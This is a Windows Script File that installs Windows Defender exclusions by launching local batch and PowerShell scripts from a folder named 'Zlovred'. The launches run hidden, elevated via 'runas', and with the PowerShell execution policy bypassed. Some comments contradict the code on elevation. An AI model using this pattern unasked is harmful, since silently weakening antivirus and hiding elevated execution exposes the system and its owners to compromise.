<?xml version="1.0" encoding="UTF-8"?>
<!-- ***************************** -->
<!-- File wsf -->
<!-- TinyExclusions.wsf -->
<!--
 * Install Tiny Exclusions
 * of the Microsoft Windows Defender
-->
<!-- ***************************** -->
<job id="ID1">
	<script language="JScript"></script>
	<script language="JScript">
	<![CDATA[
/******************************************************************************
'
' RunDownloadedCMD01( strPath, strCMD, intTimeOut )
' This Function Run Hidden a strCMD File with Elevated Privileges
' with Command "cmd /c " & strPath & "\" & strCMD
'
' PARAMETERS:   strPath -- The Path to strCMD
'               strCMD -- a CMD File with instructions
'               (Windows Command Shell)
'				intTimeOut -- Estimated Time for Running (ms)
'
' RETURNS:      0 if Success
'				1 if Path not Found
'
******************************************************************************/
function RunDownloadedCMD01(strPath, strCMD, intTimeOut) {
	var constRun_CMD, constOpt;
	// Define Windows Scripts Options
	constRun_CMD = "/c ";
	var strValue, shApp, fso, wsh, envProc, pathCMD;
	// Define ActiveX Object
	shApp = new ActiveXObject("Shell.Application");
	fso = new ActiveXObject("Scripting.FileSystemObject");
	wsh = new ActiveXObject("WScript.Shell");
	envProc = wsh.Environment("PROCESS");
	pathCMD = envProc("SystemRoot") + "\\System32";
	// Check Paths
	if(!fso.FileExists(pathCMD + "\\cmd.exe")) {
		return 1
	};
	if(!fso.FileExists(strPath + "\\" + strCMD)) {
		return 1
	};
	// Set Cscript Command Arguments
	strValue = constRun_CMD + "\"" + strPath + "\\" + strCMD + "\"";
	// Run cscript.exe without Elevated Privileges (runas) at Invisible Mode (0), with working Diretory strPath
	shApp.ShellExecute(pathCMD + "\\cmd.exe", strValue, strPath, "runas", 0);
	WScript.Sleep(intTimeOut);
	return 0;
}
/******************************************************************************
'
' RunDownloadedPwsh01( strPath, strCMD, intTimeOut )
' This Function Run Hidden a strCMD File with Elevated Privileges
' with Command "powershell -NoProfile -NoLogo -ExecutionPolicy Bypass -File \" & strPath & "\" & strCMD
'
' PARAMETERS:   strPath -- The Path to strCMD
'               strCMD -- a CMD File with instructions
'               (Windows Powershell)
'				intTimeOut -- Estimated Time for Running (ms)
'
' RETURNS:      0 if Success
'				1 if Path not Found
'
******************************************************************************/
function RunDownloadedPwsh01(strPath, strCMD, intTimeOut) {
	var constRun_CMD, constOpt;
	// Define Windows Scripts Options
	constRun_CMD = " -NoProfile -NoLogo -ExecutionPolicy Bypass -File ";
	var strValue, shApp, fso, wsh, envProc, pathCMD;
	// Define ActiveX Object
	shApp = new ActiveXObject("Shell.Application");
	fso = new ActiveXObject("Scripting.FileSystemObject");
	wsh = new ActiveXObject("WScript.Shell");
	envProc = wsh.Environment("PROCESS");
	pathCMD = envProc("SystemRoot") + "\\System32\\WindowsPowerShell\\v1.0";
	// Check Paths
	if(!fso.FileExists(pathCMD + "\\powershell.exe")) {
		return 1
	};
	if(!fso.FileExists(strPath + "\\" + strCMD)) {
		return 1
	};
	// Set Cscript Command Arguments
	strValue = constRun_CMD + "\"" + strPath + "\\" + strCMD + "\"";
	// Run cscript.exe without Elevated Privileges (runas) at Invisible Mode (0), with working Diretory strPath
	shApp.ShellExecute(pathCMD + "\\powershell.exe", strValue, strPath, "runas", 0);
	WScript.Sleep(intTimeOut);
	return 0;
}
	]]>
	</script>
	<script language="VBScript">
	<![CDATA[
	Dim strPath, strCMD1, strCMD2, iRes, iTime1, iTime2
	strPath="C:\pub1\Distrib\Zlovred"
	strCMD0="InitialCreate.bat"
	strCMD1="AllowPoShScriptsGlobal.cmd"
	strCMD2="NIT-TinyExclusions.ps1"
	iTime1 = 5000 ' 5 sec
	iTime2 = 10000 ' 10 sec
	iRes=RunDownloadedCMD01(strPath, strCMD0, iTime2)
	iRes=RunDownloadedCMD01(strPath, strCMD1, iTime1)
	iRes=RunDownloadedPwsh01(strPath, strCMD2, iTime2)
	' WScript.Echo iRes
	]]>
	</script>
</job>
